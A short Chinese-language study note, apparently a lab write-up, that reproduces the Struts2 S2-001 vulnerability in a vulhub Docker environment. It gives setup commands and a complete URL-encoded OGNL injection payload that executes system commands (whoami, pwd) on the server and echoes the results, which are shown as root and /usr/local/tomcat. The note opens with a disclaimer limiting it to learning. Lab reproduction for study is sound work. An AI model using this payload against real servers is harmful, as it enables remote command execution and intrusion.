本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》
准备工具&简介
1、centos7 已开启docker :systemctl restart docker.service()
2、进入vulhub —struts2 : cd vulhub/struts2
3、启用测试环境:docker-compose up -d
4、PC机打开网址:youIP:8080
5、开启Burpsuite抓包测试,修改Payload
复现过程
开启docker进入vulhub —struts2—s2-001命令:cd vulhub/struts2/s2-001
查看s2-001目录命令:ls
(Readme.md 英文说明, Readme.zh-cn.md 中文说明)
先查看说明文件 命令:cat Readme.zh-cn.md
启动容器
命令:docker-compose build
docker-compose up -d
PC机网页访问:
youIP :8080
显示登录页面
开启代理,开启BP 抓包
payload:%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
在例:whoami 修改为:pwd
回显出路径:/usr/local/tomcat
执行了payload 里的语句 whoami ,回显 root
执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat